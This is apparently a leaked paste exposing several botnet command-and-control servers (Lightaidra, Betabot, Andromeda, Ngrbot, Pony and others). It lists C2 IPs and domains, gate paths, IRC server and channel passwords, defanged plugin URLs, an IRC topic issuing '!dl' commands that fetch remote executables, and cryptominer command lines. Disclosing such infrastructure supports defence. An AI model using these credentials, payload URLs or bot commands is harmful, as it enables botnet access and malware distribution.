Author: I_Post_Ur_Info

178.79.183.247 (Lightaidra router botnet hosted by linode.com)

Server: 178.79.183.247, 50.2.193.199, 94.229.66.97
Port: 65112
Current global users: 2898, Max: 2988
Channel: ##hug##
Topic for ##hug## is: .advscan->random->b root dreambox
Topic for ##hug## set by gaspolo at Fri May 31 13:36:47 2013
Oper:
[GaSp`ZzzZ] (~g45p0@5.144.173.5): g45p0
[GaSp`ZzzZ] irc.primo.org :Yet another IRC Server running on Debian GNU/Linux
[GaSp`ZzzZ] idle 181:02:12, signon: Thu May 30 22:19:39
[GaSp`ZzzZ] End of WHOIS

cthulhuhf.net (Betabot http botnet hosted by warez-host.com)

Resolved cthulhuhf.net to 91.223.82.43
Server: cthulhuhf.net
Gate file: /misc/order.php
Alternate domains: cthulhuhf.eu cthulhuhf.org.uk cthulhuhf.co.uk cthulhuhf.xxx
Hosting info: http://whois.domaintools.com/91.223.82.43
Related md5s (search on malwr.com to download the samples):
Beta bot: aa07b845981ba53b6100dba745ba5c1a

www.mydowncenter.me (Andromeda http botnet hosted by pw-service.com)

Resolved www.mydowncenter.me to 37.0.122.132
Server: www.mydowncenter.me
Gate file: /andro/image.php
Plugins:
  Rootkit: hxxp://www.mydowncenter.me/andro/r.pack
  Socks: hxxp://www.mydowncenter.me/andro/s.pack
  Formgrabber: hxxp://www.mydowncenter.me/andro/f.pack
  Gate file: /andro/fg.php
Hosting info: http://whois.domaintools.com/37.0.122.132
Related md5s (search on malwr.com to download the samples):
Andromeda: a26ffa2c7bd0e7899b04768f9e76a938

s5.6d6f6e65797072696e746572.com (Betabot http botnet hosted by infiumhost.com)

Resolved s5.6d6f6e65797072696e746572.com to 188.190.127.160
Server: s5.6d6f6e65797072696e746572.com
Gate file: /wp-admin/order.php
Alternate domains: ripraktec147.com youdbeproud228.com wyomiriding928.com
Mining info: svchost.exe’ -I 100 -T 200 -t 2 -o stratum+tcp://s2.6d6f6e65797072696e746572.com:3333 -u mp187.her -p lex
Hosting info: http://whois.domaintools.com/188.190.127.160
Related md5s (search on malwr.com to download the samples):
Betabot: db9a816d58899f1ba92bc338e89f856a

breathespacesfacebook.org (Socks5Masterz botnet hosted by burst.net)

Resolved breathespacesfacebook.org to 46.37.162.26
Server: breathespacesfacebook.org
Gate file: /gate.php
Alternate domains: tweaksights.org gotoguydreamed.org percussiontasked.org tenmileage.org
Hosting info: http://whois.domaintools.com/46.37.162.26
Related md5s (search on malwr.com to download the samples):
Proxy bot: 7dc68e49d035107d132e19adf9f23d3b

t.baerr01.com (Ngrbot irc botnet hosted by Chinanet)

Resolved t.baerr01.com to 122.195.244.35, 60.172.229.40, 60.169.73.119, 121.14.212.125, 121.12.123.140, 124.232.150.181, 222.88.194.187
Server: t.baerr01.com
Port: 6512
Server password: smart
Channel: #dpi
:hub.us.com 332 n[US{XPu{pwvvvwa #dpi :!mdns hxxp://146.185.246.192/av.txt !dl hxxp://146.185.246.192/111.exe !dl hxxp://146.185.246.192/brentback.exe !dl hxxp://146.185.246.192/dqw7.exe
Channel: #tar
Channel password: smart
A modified ircd is used, making it difficult to connect using a regular irc client.
Related md5s (search on

www.welovegiveaways.net (Andromeda http botnet hosted by enzu.com)

Resolved www.welovegiveaways.net to 199.229.235.250
Server: www.welovegiveaways.net
Gate file: /justricewithwater/image.php
Plugins:
  Rootkit: hxxp://www.welovegiveaways.net/justricewithwater/r.pack
Bitcoin mining info:
Shell.exe” -o stratum+tcp://stratum.bitcoin.cz:3333 -u vovler.split1  -p none -t 0 -I 10
macromedia.exe” -o stratum+tcp://stratum.bitcoin.cz:3333 -u vovler.split1  -p none -g no
Hosting info: http://whois.domaintools.com/199.229.235.250

toxhoster.net (Pony loader hosted by ecatel.net)

Resolved toxhoster.net to 80.82.79.35
Server: toxhoster.net
Gate file: /forum/gate.php
Some idiot set it to download itself from the server, so it will run in an endless loop of stealing passwords, sending logs, and then downloading and running itself.
Hosting info: http://whois.domaintools.com/80.82.79.35
Related md5s (search on malwr.com to download the samples):
b22258989a5e93d4cb1c3960441c1c06